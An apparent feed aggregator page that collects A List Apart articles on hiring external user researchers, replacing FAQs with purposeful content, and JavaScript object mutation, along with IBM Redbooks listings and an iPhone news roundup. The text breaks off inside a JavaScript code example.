Feed aggregator

Working with External User Researchers: Part I

A list Apart development site - Tue, 01/16/2018 - 10:00

You’ve got an idea or perhaps some rough sketches, or you have a fully formed product nearing launch. Or maybe you’ve launched it already. Regardless of where you are in the product lifecycle, you know you need to get input from users.

You have a few sound options to get this input: use a full-time user researcher or contract out the work (or maybe a combination of both). Between the three of us, we’ve run a user research agency, hired external researchers, and worked as freelancers. Through our different perspectives, we hope to provide some helpful considerations.

Should you hire an external user researcher?

First things first–in this article, we focus on contracting external user researchers, meaning that a person or team is brought on for the duration of a contract to conduct the research. Here are the most common situations where we find this type of role:

Organizations without researchers on staff: It would be great if companies validated their work with users during every iteration. But unfortunately, in real-world projects, user research happens at less frequent intervals, meaning there might not be enough work to justify hiring a full-time researcher. For this reason, it sometimes makes sense to use external people as needed.

Organizations whose research staff is maxed out: In other cases, particularly with large companies, there may already be user researchers on the payroll. Sometimes these researchers are specific to a particular effort, and other times the researchers themselves function as internal consultants, helping out with research across multiple projects. Either way, there is a finite amount of research staff, and sometimes the staff gets overbooked. These companies may then pull in additional contract-based researchers to independently run particular projects or to provide support to full-time researchers.

Organizations that need special expertise: Even if a company does have user research on staff and those researchers have time, it’s possible that there are specialized kinds of user research for which an external contract-based researcher is brought on. For example, they may want to do research with representative users who regularly use screen readers, so they bring in an accessibility expert who also has user research skills. Or they might need a researcher with special quantitative skills for a certain project.

Why hire an external researcher vs. other options?

Designers as researchers: You could hire a full-time designer who also has research skills. But a designer usually won’t have the same level of research expertise as a dedicated researcher. Additionally, they may end up researching their own designs, making it extremely difficult to moderate test sessions without any form of bias.

Product managers as researchers: While it’s common for enthusiastic product managers to want to conduct their own guerilla user research, this is often a bad idea. Product managers tend to hear feedback that validates their ideas and most often aren’t trained on how to ask non-leading questions.

Temporary roles: You could also bring on a researcher in a staff augmentation role, meaning someone who works for you full-time for an extended period of time, but who is not considered a full-time employee. This can be a bit harder to justify. For example, there may be legal requirements that you’d have to pass if you directly contract an individual. Or you could find someone through a staffing agency–fewer legal hurdles, but likely far pricier.

If these options don’t sound like a good fit for your needs, hiring an external user researcher on a project-specific basis could be the best solution for you. They give you exactly what you need without additional commitment or other risks. They may be a freelancer (or a slightly larger microbusiness), or even a team farmed out for a particular project by a consulting firm or agency.

What kinds of projects would you contract a user researcher for?

You can reasonably expect that any person or company advertising user research as a core skill can handle the full scope of qualitative efforts—from usability studies of all kinds, to card sorts, to ethnographic and exploratory work.

Contracting out quantitative work is a bit riskier. An analogy that comes to mind is using TurboTax to file your taxes. While TurboTax may be just fine for many situations, it’s easy to overlook what you don’t know in terms of more complicated tax regulations, which can quickly get you in trouble. Similarly, with quantitative work, there’s a long list of diverse, specialized quantitative skills (e.g., logs analysis, conjoint, Kano, and multiple regression). Don’t assume someone advertising as a general quantitative user researcher has the exact skills you need.

Also, for some companies, quantitative work comes with unique user privacy considerations that can require special internal permissions from legal and privacy teams.

But if the topic of your project is pretty easy to grasp and absorb without needing much specialized technical or organizational insight, hiring an external researcher is generally a great option.

What are the benefits to hiring an external researcher?

A new, objective perspective is one major benefit to hiring an external researcher. We all suffer from design fixation and are influenced by organizational politics and perceived or real technical constraints. Hiring an unbiased external researcher can uncover more unexpected issues and opportunities.

Contracting a researcher can also expand an internal researcher’s ability to influence. Having someone else moderate research studies frees up in-house researchers to be part of the conversations among stakeholders that happen while user interviews are being observed. If they are intuitively aware of an issue or opportunity, they can emphasize their perspective during those critical, decision-making moments that they often miss out on when they moderate studies themselves. In these situations, the in-house team can even design the study plan, draft the discussion guide, and just have the contractor moderate the study. The external researcher may then collaborate with the in-house researcher on the final report.

More candid and honest feedback can come out of hiring an external researcher. Research participants tend to be more comfortable sharing more critical feedback with someone who doesn’t work for the company whose product is being tested.

Lastly, if you need access to specialized research equipment or software (for example, proprietary online research tools), it can be easier to get it via an external researcher.

How do I hire an external user researcher?

So you’ve decided that you need to bring on an external user researcher to your team. How do you get started?

Where to find them

Network: Don’t wait until you need help to start networking and collecting a list of external researchers. Be proactive. Go to UX events in your local region. You’ll meet consultants and freelancers at those events, as well as people who have contracted out research and can make recommendations. You won’t necessarily have the opportunity for deep conversations, but you can continue a discussion over coffee or drinks!

Referrals: Along those same lines, when you anticipate a need at some point in the future, seek out trusted UX colleagues at your company and elsewhere. Ask them to connect you with people that they may have worked with.

What about a request for proposal (RFP)?

Your company may require you to specify your need in the form of an RFP, which is a document that outlines your project needs and specifications, and asks for bids in response.

An RFP provides these benefits:

  • It keeps the playing field level, and anyone who wants to bid on a project can (in theory).
  • You can be very specific about what you’re looking for, and get bids that can be easy to compare on price.

On the other hand, an RFP comes with limitations:

  • You may think your requirements were very specific, but respondents may interpret them in different ways. This can result in large quote differences.
  • You may be eliminating smaller players—those freelancers and microbusinesses who may be able to give you the highest level of seniority for the dollar but don’t have the staff to respond to RFPs quickly.
  • You may be forced to be very concrete about your needs when you are not yet sure what you’ll actually need.

When it comes to RFPs, the most important thing to remember is to clearly and thoroughly specify your needs. Don’t forget to include small but important details that can matter in terms of pricing, such as answers to these questions:

  • Who is responsible for recruitment of research participants?
  • How many participants do you want included?
  • Who will be responsible for distributing participant incentives?
  • Who will be responsible for localizing prototypes?
  • How long will sessions be?
  • Over how many days and locations will they be?
  • What is the format of expected deliverables?
  • Do you want full, transcribed videos, or video clips?

It’s these details that will ultimately result in receiving informed proposals that are easy to compare.

Do a little digging on their backgrounds

Regardless of how you find a potential researcher, make sure you check out their credentials if you haven’t worked with them before.

At the corporate level, review the company: Google them and make sure that user research seems to be one of their core competencies. The same is true when dealing with a freelancer or microbusiness: Google them and see whether you get research-oriented results, and also check them out on social media.

Certainly feel free to ask for references if you don’t already have a direct connection, but take them with a grain of salt. Between the self-selecting nature of a reference, and a potential reference just trying to be nice to a friend, these can never be fully trusted.

One of the strongest indicators of experience and quality work is if a researcher has been hired by the same client for more than one project over time.

Larger agencies, individual researchers, or something in-between?

So you’ve got a solid sense of what research you need, and you’ve got several quality options to choose from. But external researchers come in all shapes and sizes, from single freelancers to very large agencies. How do you choose what’s best for your project while still evaluating the external researchers fairly?

Larger consulting firms and agencies do have some distinct advantages—namely that you’ve got a large company to back up the project. Even if one researcher isn’t available as expected (for example, if the project timeline slips), another can take their place. They also likely have a whole infrastructure for dealing with contracts like yours.

On the other hand, this larger infrastructure may add extra burden on your side. You may not know who exactly is going to be working on your project, or their level of seniority or experience. Changes in scope will likely be more involved. Larger infrastructure also likely means higher costs.

Individual (freelance) researchers also have some key advantages. You will likely have more control over contracting requirements. They are also likely to be more flexible—and less costly. In addition, if they were referred to you, you will be working with a specific resource that you can get to know over multiple projects.

Bringing on individual researchers can incur a little more risk. You will need to make sure that you can properly justify hiring an external researcher instead of an employee. (In the United States, for example, the IRS applies a set of tests to determine whether someone can legitimately be classified as a contractor rather than an employee.) And if your project timeline slips, you run a greater risk of losing the researcher to some other commitment without someone to replace them.

A small business, a step between an individual researcher and a large firm, has some advantages over hiring an individual. Contracting an established business may involve less red tape, and you will still have the personal touch of knowing exactly who is conducting your research.

An established business also shows a certain level of commitment, even if it’s one person. For example, a microbusiness could represent a single freelancer, but it could also involve a very small number of employees or established relationships with trusted subcontractors (or both). Whatever the configuration, don’t expect a business of this size to have the ability to readily respond to RFPs.

The money question

Whether you solicit RFPs or get a single bid, price quotes will often differ significantly. User research is not a product but rather a customized and sophisticated effort around your needs. Here are some important things to consider:

  • Price quotes are a reflection of how a project is interpreted. Different researchers are going to interpret your needs in different ways. A good price quote clearly details any assumptions that are going into pricing so you can quickly see if something is misaligned.
  • Research teams are made up of staff with different levels of experience. A quote is going to be a reflection of the overall seniority of the team, their salaries and benefits, the cost of any business resources they use, and a reasonable profit margin for the business.
  • Businesses all want to make a reasonable profit, but approaches to profitability differ. Some organizations may balance having a high volume of work with less profit per project. Other organizations may take more of a boutique approach: more selectivity over projects taken on, with added flexibility to focus on those projects, but also with a higher profit margin.
  • Overbooked businesses provide higher quotes. Some consultants and agencies are in the practice of rarely saying no to a request, even if they are at capacity in terms of their workload. In these instances, it can be a common practice to multiply a quote by as much as three—if you say no, no harm done given they’re at capacity. However, if you say yes, the substantial profit is worth the cost for them to hire additional resources and to work temporarily above capacity in the meantime.

To determine whether a researcher or research team is right for you, you’ll certainly need to look at the big picture, including pricing, associated assumptions, and the seniority and background of the individuals who are doing the work.

Remember, it’s always OK to negotiate

If you have a researcher or research team that you want to work with but their pricing isn’t in line with your budget, let them know. It could be that the quote is just based on faulty assumptions. They may expect you to negotiate and are willing to come down in price; they may also offer alternative, cheaper options.

Next steps

Hiring an external user researcher typically brings a long list of benefits. But like most relationships, you’ll need to invest time and effort to foster a healthy working dynamic between you, your external user researcher, and your team. Stay tuned for the next installment, where we’ll focus on how to collaborate together.

Categories: Technology

IBM FlashSystem 900 Model AE3 Product Guide

IBM Redbooks Site - Mon, 01/15/2018 - 08:30
Redpaper, published: Mon, 15 Jan 2018

Today’s global organizations depend on the ability to unlock business insights from massive volumes of data.

Categories: Technology

IBM Spectrum Archive Enterprise Edition V1.2.5.1 Installation and Configuration Guide

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Redbook, published: Fri, 12 Jan 2018

This IBM® Redbooks® publication helps you with the planning, installation, and configuration of the new IBM Spectrum™ Archive V1.2.5.1 for the IBM TS3310, IBM TS3500, IBM TS4300, and IBM TS4500 tape libraries.

Categories: Technology

IBM Spectrum Scale: Big Data and Analytics Solution Brief

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Draft Redpaper, last updated: Fri, 12 Jan 2018

This IBM® Redguide™ publication describes big data and analytics (BD&A) deployments that are built on IBM Spectrum Scale™.

Categories: Technology

IBM FlashSystem V9000 AE3 and AC3 Performance

IBM Redbooks Site - Fri, 01/12/2018 - 08:30
Draft Redpaper, last updated: Fri, 12 Jan 2018

This IBM® Redpaper™ publication provides information about the best practices and performance capabilities when implementing a storage solution using IBM FlashSystem® V9000 9846-AC3 with IBM FlashSystem V9000 9846-AE3 storage enclosures.

Categories: Technology

In the news

iPhone J.D. - Fri, 01/12/2018 - 00:08

I reported earlier this week on new rules relating to confidential and privileged data on an iPhone when you pass through customs to re-enter the U.S.  Maureen Blando of Mobile Helix discusses one alternative to dealing with Customs:  keep your data on a cloud-based service (like Mobile Helix) so that you can just remove the app before you enter customs — at which point the privileged documents won't even be there anymore — and then re-install the app after you pass through.  1Password offers something similar called Travel Mode whereby all but a few passwords you select are removed from the device, and then you restore them after you enter customs.  If you use Microsoft Exchange with the Mail app on your iPhone, you could just turn off your email in the Settings app (Accounts & Passwords -> [select account] -> turn off Mail) until you get to a location where you feel secure again, and then turn it back on to re-download your messages.  And now, the news of note from the past week:

  • Samantha Cole of Motherboard reports on a murder trial in Germany in which some of the evidence of the defendant disposing of a body in the river consists of data from the defendant's iPhone.  After hiring a forensics company to bypass the passcode on his iPhone 6s, the investigators found data in the Health app showing that the defendant climbed stairs during the period of time that the prosecution alleges that the defendant climbed up the river embankment.
  • According to Katherine Faulders of ABC News, this week White House Chief of Staff John Kelly instituted a new ban on personal cellphones in the White House.  The ban extends to smartwatches, like the Apple Watch.  I suspect that there will still be one particular iPhone in the White House not subject to the ban.
  • Chance Miller of 9to5Mac reports on a recent interview by Rebecca Jarvis of ABC Radio with Angela Ahrendts, Apple VP of Retail.  The video discusses how Ahrendts got the job even though she doesn't consider herself a "techie."
  • Paula Parisi of Variety reports that Jimmy Iovine, one of the Apple executives behind Apple Music, has denied rumors that he is planning to leave Apple this year, and says that he looks forward to further developments in online streaming.
  • Apple released iOS 11.2.2 this week.  As Juli Clover of MacRumors explains, this update addresses the Meltdown and Spectre vulnerabilities that have been in the news as of late.  I always recommend that you update your iPhone (and iPad) when there is a new iOS version to make sure that you have the latest security patches, although it does make sense to wait 24 hours before applying the update just in case Apple discovers some problem with the update, which happens occasionally.
  • If you want an alternative to using your iPhone, Apple Watch or Siri to turn off your HomeKit lights, you can soon buy a big red button — or one of another color.  Zac Hall of 9to5Mac reports that Fibaro's The Button will soon be HomeKit compatible.
  • Jesse Hollington of iLounge explains how you can handoff a call from your iPhone to your Apple Watch.  I didn't realize you could do that.
  • Bradley Chambers of The Sweet Setup reviews Workouts++ and says that it is the best stand-alone workout app on the Apple Watch.
  • Thuy Ong of The Verge reports that the Qi wireless standard used by Apple in the iPhone X and the iPhone 8 is becoming even more of a standard now that Powermat is giving up on the rival PMA standard.
  • Chaim Gartenberg of The Verge discusses some of Belkin's upcoming Qi chargers for the iPhone.
  • Glenn Fleishman of Macworld discusses how the iPhone uses a captive page on the Apple website to determine whether a Wi-Fi hotspot has a sign-in page.
  • And finally, the always funny xkcd comic predicts what future iPhone security settings might look like (original link):

 

Categories: iPhone Web Sites

No More FAQs: Create Purposeful Information for a More Effective User Experience

A list Apart development site - Thu, 01/11/2018 - 10:00

It’s normal for your website users to have recurring questions and need quick access to specific information to complete … whatever it is they came looking for. Many companies still opt for the ubiquitous FAQ (frequently asked/anticipated questions) format to address some or even all information needs. But FAQs often miss the mark because people don’t realize that creating effective user information—even when using the apparently simple question/answer format—is complex and requires careful planning.

As a technical writer and now information architect, I’ve worked to upend this mediocre approach to web content for more than a decade, and here’s what I’ve learned: instead of defaulting to an unstructured FAQ, invest in information that’s built around a comprehensive content strategy specifically designed to meet user and company goals. We call it purposeful information.

The problem with FAQs

Because of the internet’s Usenet heritage—discussion boards where regular contributors would produce FAQs so they didn’t have to repeat information for newbies—a lot of early websites started out by providing all information via FAQs. Well, the ‘80s called, and they want their style back!

Unfortunately, content in this simple format can often be attractive to organizations, as it’s “easy” to produce without the need to engage professional writers or comprehensively work on information architecture (IA) and content strategy. So, like zombies in a horror film, and with the same level of intellectual rigor, FAQs continue to pop up all over the web. The trouble is, this approach to documentation-by-FAQ has problems, and the information is about as far from being purposeful as it’s possible to get.

For example, when companies and organizations resort to documentation-by-FAQ, it’s often the only place certain information exists, yet users are unlikely to spend the time required to figure that out. Conversely, if information is duplicated, it’s easy for website content to get out of sync. The FAQ page can also be a dumping ground for any information a company needs to put on the website, regardless of the topic. Worse, the page’s format and structure can increase confusion and cognitive load, while including obviously invented questions and overt marketing language can result in losing users’ trust quickly. Looking at each issue in more detail:

  • Duplicate and contradictory information: Even on small websites, it can be hard to maintain information. On large sites with multiple authors and an unclear content strategy, information can get out of sync quickly, resulting in duplicate or even contradictory content. I once purchased food online from a company after reading in their FAQ—the content that came up most often when searching for allergy information—that the product didn’t contain nuts. However, on receiving the product and reading the label, I realized the FAQ information was incorrect, and I was able to obtain a refund. An information architecture (IA) strategy that includes clear pathways to key content not only better supports user information needs that drive purchases, but also reduces company risk. If you do have to put information in multiple locations, consider using an object-oriented content management system (CMS) so content is reused, not duplicated. (Our company open-sourced one called Fae.)
  • Lack of discernible content order: Humans want information to be ordered in ways they can understand, whether it’s alphabetical, time-based, or by order of operation, importance, or even frequency. The question format can disguise this organization by hiding the ordering mechanism. For example, I could publish a page that outlines a schedule of household maintenance tasks by frequency, with natural categories (in order) of daily, weekly, monthly, quarterly, and annually. But putting that information into an FAQ format, such as “How often should I dust my ceiling fan?,” breaks that logical organization of content—it’s potentially a stand-alone question. Even on a site that’s dedicated only to household maintenance, that information will be more accessible if placed within the larger context of maintenance frequency.
  • Repetitive grammatical structure: Users like to scan for information, so having repetitive phrases like “How do I …” that don’t relate to the specific task make it much more difficult for readers to quickly find the relevant content. In a lengthy help page with catch-all categories, like the Patagonia FAQ page, users have to swim past a sea of “How do I …,” “Why can’t I …,” and “What do I …” phrases to get to the actual information. While categories can help narrow the possibilities, the user still has to take the time to find the most likely category and then the relevant question within it. The Patagonia website also shows how an FAQ section can become a catch-all. Oh, how I’d love the opportunity to restructure all that Patagonia information into purposeful information designed to address user needs at the exact right moment. So much potential!
  • Increased cognitive load: As well as being repetitive, the question format can also be surprisingly specific, forcing users to mentally break apart the wording of the questions to find a match for their need. If a question appears to exclude the required information, the user may never click to see the answer, even if it is actually relevant. Answers can also raise additional, unnecessary questions in the minds of users. Consider the FAQ-formatted “Can I pay my bill with Venmo?” (which limits the answer to one payment type that only some users may recognize). Rewriting the question to “How can I pay my bill online?” and updating the content improves the odds that users will read the answer and be able to complete their task. However, an even better approach is to create purposeful content under the more direct and concise heading “Online payment options,” which is broad enough to cover all payment services (as a topic in the “Bill Payments” portion of a website), as well as instructions and other task-orientated information.
  • Longer content requirements: In most cases, questions have a longer line length than topic headings. The Airbnb help page illustrates when design and content strategy clash. The design truncates the question after 40 characters when the browser viewport is wider than 743 pixels. You have to click the question to find out if it holds the answer you need—far from ideal! Yet the heading “I’m a guest. How do I check the status of my reservation?” could easily have been rewritten as “Checking reservation status” or even “Guests: Checking reservation status.” Not only do these alternatives fit within the line length limitations set by the design, but the lower word count and simplified English also reduce translation costs (another issue some companies have to consider).

Purposeful information

Grounded in the Minimalist approach to technical documentation, the idea behind purposeful information is that users come to any type of content with a particular purpose in mind, ranging from highly specific (task completion) to general learning (increased knowledge). Different websites—and even different areas within a single website—may be aimed at different users and different purposes. Organizations also have goals when they construct websites, whether they’re around brand awareness, encouraging specific user behavior, or meeting legal requirements. Companies that meld user and organization goals in a way that feels authentic can be very successful in building brand loyalty.

Commerce sites, for example, have the goal of driving purchases, so the information on the site needs to provide content that enables effortless purchasing decisions. For other sites, the goal might be to drive user visits, encourage newsletter sign-ups, or increase brand awareness. In any scenario, burying the pathways users need to complete their goals in an FAQ is a guaranteed way to make it less likely that the organization will meet its own.

By digging into what users need to accomplish (not a general “they need to complete the form,” but the underlying, real-world task, such as getting a shipping quote, paying a bill, accessing health care, or enrolling in college), you can design content to provide the right information at the right time and better help users accomplish those goals. As well as making it less likely you’ll need an FAQ section at all, using this approach to generate a credible IA and content strategy—the tools needed to determine a meaningful home for all your critical content—will build authority and user trust.

Defining specific goals when planning a website is therefore essential if content is to be purposeful throughout the site. Common user-centered methodologies employed during both IA and content planning include user-task analysis, content audits, personas, user observations, and analysis of call center data and web analytics. A complex project might use multiple methodologies to define the content strategy and supporting IA to provide users with the necessary information.

The redesign of the Oliver Winery website is a good example of creating purposeful information instead of resorting to an FAQ. There was a user goal of being able to find practical information about visiting the winery (such as details regarding food, private parties, etc.), yet this information was scattered across various pages, including a partially complete FAQ. There was a company goal of reducing the volume of calls to customer support. In the redesign, a single page called “Plan Your Visit” was created with all the relevant topics. It is accessible from the “Visit” section and via the main navigation.

The system used is designed to be flexible. Topics are added, removed, and reordered using the CMS, and published on the “Plan Your Visit” page, which also shows basic logistical information like hours and contact details, in a non-FAQ format. Conveniently, contact details are maintained in only one location within the CMS yet published on various pages throughout the site. As a result, all information is readily available to users, increasing the likelihood that they’ll make the decision to visit the winery.

If you have to include FAQs

This happens. Even though there are almost always more effective ways to meet user needs than writing an FAQ, FAQs happen. Sometimes the client insists, and sometimes even the most ardent opponent (ahem) concludes that in a very particular circumstance, an FAQ can be purposeful. The most effective FAQ is one with a specific, timely, or transactional need, or one with information that users need repeated access to, such as when paying bills or organizing product returns.

Good topics for an FAQ include transactional activities, such as those involved in the buying process: think shipments, payments, refunds, and returns. By being specific and focusing on a particular task, you avoid the categorization problem described earlier. By limiting questions to those that are frequently asked AND that have a very narrow focus (to reduce users having to sort through lots of content), you create more effective FAQs.

Amazon’s support center has a great example of an effective FAQ within their overall support content because they have exactly one: “Where’s My Stuff?.” Set under the “Browse Help Topics” heading, the question leads to a list of task-based topics that help users track down the location of their missing packages. Note that all of the other support content is purposeful, set in a topic-based help system that’s nicely categorized, with a search bar that allows users to dive straight in.

Conference websites, which by their nature are already focused on a specific company goal (conference sign-ups), often have an FAQ section that covers basic conference information, logistics, or the value of attending. This can be effective. However, for the reasons outlined earlier, the content can quickly become overwhelming if conference organizers try to include all information about the conference as a single list of questions, as demonstrated by Web Summit’s FAQ page. Overdoing it can cause confusion even when the design incorporates categories and an otherwise useful UX that includes links, buttons, or tabs, such as on the FAQ page of The Next Web Conference.

In examining these examples, it’s apparent how much more easily users could access the information if it wasn’t presented as questions. But if you do have to use FAQs, here are my tips for creating the best possible user experience.

Creating a purposeful FAQ:

  • Make it easy to find.
  • Have a clear purpose and highly specific content in mind.
  • Give it a clear title related to the user tasks (e.g., “Shipping FAQ” rather than just “FAQ”).
  • Use clear, concise wording for questions.
  • Focus questions on user goals and tasks, not on product or brand.
  • Keep it short.

What to avoid in any FAQ:

  • Don’t include “What does FAQ stand for?” (unfortunately, not a fictional example). Instead, simply define acronyms and initialisms on first use.
  • Don’t define terms using an FAQ format—it’s a ticket straight to documentation hell. If you have to define terms, what you need is a glossary, not FAQs.
  • Don’t tell your brand story or company history, or pontificate. People don’t want to know as much about your brand, product, and services as you are eager to tell them. Sorry.

In the end, always remember your users

Your website should be filled with purposeful content that meets users’ core needs and fulfills your company’s objectives. Do your users and your bottom line a favor and invest in effective user analysis, IA, content strategy, and documentation. Your users will be able to find the information they need, and your brand will be that much more awesome as a result.

Categories: Technology

IBM System Storage SAN Volume Controller and Storwize V7000 Best Practices and Performance Guidelines

IBM Redbooks Site - Wed, 01/10/2018 - 08:30
Draft Redbook, last updated: Wed, 10 Jan 2018

This IBM® Redbooks® publication captures several of the preferred practices and describes the performance gains that can be achieved by implementing the IBM System Storage® SAN Volume Controller and IBM Storwize® V7000 powered by IBM Spectrum™ Virtualize V8.1.

Categories: Technology

Why Mutation Can Be Scary

A list Apart development site - Tue, 01/09/2018 - 10:00

A note from the editors: This article contains sample lessons from Learn JavaScript, a course that helps you learn JavaScript to build real-world components from scratch.

To mutate means to change in form or nature. Something that’s mutable can be changed, while something that’s immutable cannot be changed. To understand mutation, think of the X-Men. In X-Men, people can suddenly gain powers. The problem is, you don’t know when these powers will emerge. Imagine your friend turns blue and grows fur all of a sudden; that’d be scary, wouldn’t it?

In JavaScript, the same problem with mutation applies. If your code is mutable, you might change (and break) something without knowing.

Objects are mutable in JavaScript

In JavaScript, you can add properties to an object. When you do so after instantiating it, the object is changed permanently. It mutates, like how an X-Men member mutates when they gain powers.

In the example below, the variable egg mutates once you add the isBroken property to it. We say that objects (like egg) are mutable (have the ability to mutate).

const egg = { name: "Humpty Dumpty" };
egg.isBroken = false;

console.log(egg);
// {
//   name: "Humpty Dumpty",
//   isBroken: false
// }

Mutation is pretty normal in JavaScript. You use it all the time.

Here’s when mutation becomes scary.

Let’s say you create a constant variable called newEgg and assign egg to it. Then you want to change the name of newEgg to something else.

const egg = { name: "Humpty Dumpty" };
const newEgg = egg;

newEgg.name = "Errr ... Not Humpty Dumpty";

When you change (mutate) newEgg, did you know egg gets mutated automatically?

console.log(egg);
// {
//   name: "Errr ... Not Humpty Dumpty"
// }

The example above illustrates why mutation can be scary—when you change one piece of your code, another piece can change somewhere else without your knowing. As a result, you’ll get bugs that are hard to track and fix.

This weird behavior happens because objects are passed by reference in JavaScript.

Objects are passed by reference in JavaScript

To understand what “passed by reference” means, first you have to understand that each object has a unique identity in JavaScript. When you assign an object to a variable, you link the variable to the identity of the object (that is, you pass it by reference) rather than assigning the variable the object’s value directly. This is why when you compare two different objects, you get false even if the objects have the same value.

console.log({} === {}); // false

When you assign egg to newEgg, newEgg points to the same object as egg. Since egg and newEgg are the same thing, when you change newEgg, egg gets changed automatically.

console.log(egg === newEgg); // true

Unfortunately, you don’t want egg to change along with newEgg most of the time, since it causes your code to break when you least expect it. So how do you prevent objects from mutating? Before you understand how to prevent objects from mutating, you need to know what’s immutable in JavaScript.

Primitives are immutable in JavaScript

In JavaScript, primitives (String, Number, Boolean, Null, Undefined, and Symbol) are immutable; you cannot change the structure (add properties or methods) of a primitive. Nothing will happen even if you try to add properties to a primitive.

const egg = "Humpty Dumpty";
egg.isBroken = false;

console.log(egg); // Humpty Dumpty
console.log(egg.isBroken); // undefined

const doesn’t grant immutability

Many people think that variables declared with const are immutable. That’s an incorrect assumption.

Declaring a variable with const doesn’t make it immutable, it prevents you from assigning another value to it.

const myName = "Zell";
myName = "Triceratops"; // ERROR

When you declare an object with const, you’re still allowed to mutate the object. In the egg example above, even though egg is created with const, const doesn’t prevent egg from mutating.

const egg = { name: "Humpty Dumpty" };
egg.isBroken = false;

console.log(egg);
// {
//   name: "Humpty Dumpty",
//   isBroken: false
// }

Preventing objects from mutating

You can use Object.assign and assignment to prevent objects from mutating.

Object.assign

Object.assign lets you combine two (or more) objects together into a single one. It has the following syntax:

const newObject = Object.assign(object1, object2, object3, object4);

newObject will contain properties from all of the objects you’ve passed into Object.assign.

const papayaBlender = { canBlendPapaya: true };
const mangoBlender = { canBlendMango: true };

const fruitBlender = Object.assign(papayaBlender, mangoBlender);

console.log(fruitBlender);
// {
//   canBlendPapaya: true,
//   canBlendMango: true
// }

If two conflicting properties are found, the property in a later object overwrites the property in an earlier object (in the Object.assign parameters).

const smallCupWithEar = { volume: 300, hasEar: true };
const largeCup = { volume: 500 };

// In this case, volume gets overwritten from 300 to 500
const myIdealCup = Object.assign(smallCupWithEar, largeCup);

console.log(myIdealCup);
// {
//   volume: 500,
//   hasEar: true
// }

But beware! When you combine two objects with Object.assign, the first object gets mutated. Other objects don’t get mutated.

console.log(smallCupWithEar);
// {
//   volume: 500,
//   hasEar: true
// }

console.log(largeCup);
// {
//   volume: 500
// }

Solving the Object.assign mutation problem

You can pass a new object as your first object to prevent existing objects from mutating. You’ll still mutate the first object though (the empty object), but that’s OK since this mutation doesn’t affect anything else.

const smallCupWithEar = { volume: 300, hasEar: true };
const largeCup = { volume: 500 };

// Using a new object as the first argument
const myIdealCup = Object.assign({}, smallCupWithEar, largeCup);

You can mutate your new object however you want from this point. It doesn’t affect any of your previous objects.

myIdealCup.picture = "Mickey Mouse";

console.log(myIdealCup);
// {
//   volume: 500,
//   hasEar: true,
//   picture: "Mickey Mouse"
// }

// smallCupWithEar doesn't get mutated
console.log(smallCupWithEar); // { volume: 300, hasEar: true }

// largeCup doesn't get mutated
console.log(largeCup); // { volume: 500 }

But Object.assign copies references to objects

The problem with Object.assign is that it performs a shallow merge—it copies properties directly from one object to another. When it does so, it also copies references to any objects.

Let’s explain this statement with an example.

Suppose you buy a new sound system. The system allows you to declare whether the power is turned on. It also lets you set the volume, the amount of bass, and other options.

const defaultSettings = {
  power: true,
  soundSettings: {
    volume: 50,
    bass: 20,
    // other options
  }
};

Some of your friends love loud music, so you decide to create a preset that’s guaranteed to wake your neighbors when they’re asleep.

const loudPreset = {
  soundSettings: {
    volume: 100
  }
};

Then you invite your friends over for a party. To preserve your existing presets, you attempt to combine your loud preset with the default one.

const partyPreset = Object.assign({}, defaultSettings, loudPreset);

But partyPreset sounds weird. The volume is loud enough, but the bass is non-existent. When you inspect partyPreset, you’re surprised to find that there’s no bass in it!

console.log(partyPreset);
// {
//   power: true,
//   soundSettings: {
//     volume: 100
//   }
// }

This happens because JavaScript copies over the reference to the soundSettings object. Since both defaultSettings and loudPreset have a soundSettings object, the one that comes later gets copied into the new object.

If you change partyPreset, loudPreset will mutate accordingly—evidence that the reference to soundSettings gets copied over.

partyPreset.soundSettings.bass = 50;

console.log(loudPreset);
// {
//   soundSettings: {
//     volume: 100,
//     bass: 50
//   }
// }

Since Object.assign performs a shallow merge, you need to use another method to merge objects that contain nested properties (that is, objects within objects).

Enter assignment.

assignment

assignment is a small library made by Nicolás Bevacqua from Pony Foo, which is a great source for JavaScript knowledge. It helps you perform a deep merge without having to worry about mutation. Aside from the method name, the syntax is the same as Object.assign.

// Perform a deep merge with assignment
const partyPreset = assignment({}, defaultSettings, loudPreset);

console.log(partyPreset);
// {
//   power: true,
//   soundSettings: {
//     volume: 100,
//     bass: 20
//   }
// }

assignment copies over values of all nested objects, which prevents your existing objects from getting mutated.

If you try to change any property in partyPreset.soundSettings now, you’ll see that loudPreset remains as it was.

partyPreset.soundSettings.bass = 50;

// loudPreset doesn't get mutated
console.log(loudPreset);
// {
//   soundSettings: {
//     volume: 100
//   }
// }

assignment is just one of many libraries that help you perform a deep merge. Other libraries, including lodash.assign and merge-options, can help you do it, too. Feel free to choose from any of these libraries.
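For instance, here is a minimal sketch of the same merge using merge-options (assuming its default export simply takes the objects to merge and returns a new, deeply merged object without touching its inputs):

const mergeOptions = require("merge-options");

// Deep merge; defaultSettings and loudPreset are not mutated
const partyPreset = mergeOptions(defaultSettings, loudPreset);

console.log(partyPreset);
// {
//   power: true,
//   soundSettings: {
//     volume: 100,
//     bass: 20
//   }
// }

Whichever library you pick, check its documentation to confirm whether it mutates the first argument (as Object.assign does) or always returns a fresh object.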

Should you always use assignment over Object.assign?

As long as you know how to prevent your objects from mutating, you can use Object.assign. There’s no harm in using it as long as you know how to use it properly.

However, if you need to assign objects with nested properties, always prefer a deep merge over Object.assign.

Ensuring objects don’t mutate

Although the methods I mentioned can help you prevent objects from mutating, they don’t guarantee that objects don’t mutate. If you made a mistake and used Object.assign for a nested object, you’ll be in for deep trouble later on.

To safeguard yourself, you might want to guarantee that objects don’t mutate at all. To do so, you can use libraries like ImmutableJS. This library throws an error whenever you attempt to mutate an object.
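As a rough sketch of that approach with Immutable.js (assuming the Map, set, and get API from its documentation), every update returns a new collection instead of changing the original in place:

const { Map } = require("immutable");

const egg = Map({ name: "Humpty Dumpty" });

// set() returns a brand-new Map; the original egg is untouched
const brokenEgg = egg.set("isBroken", true);

console.log(egg.get("isBroken"));       // undefined
console.log(brokenEgg.get("isBroken")); // true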

Alternatively, you can use Object.freeze and deep-freeze. These two methods fail silently (they don’t throw errors, but they also don’t mutate the objects).

Object.freeze and deep-freeze

Object.freeze prevents direct properties of an object from changing.

const egg = { name: "Humpty Dumpty", isBroken: false };

// Freezes the egg
Object.freeze(egg);

// Attempting to change properties will silently fail
egg.isBroken = true;

console.log(egg); // { name: "Humpty Dumpty", isBroken: false }

But it doesn’t help when you mutate a deeper property like defaultSettings.soundSettings.bass.

const defaultSettings = {
  power: true,
  soundSettings: {
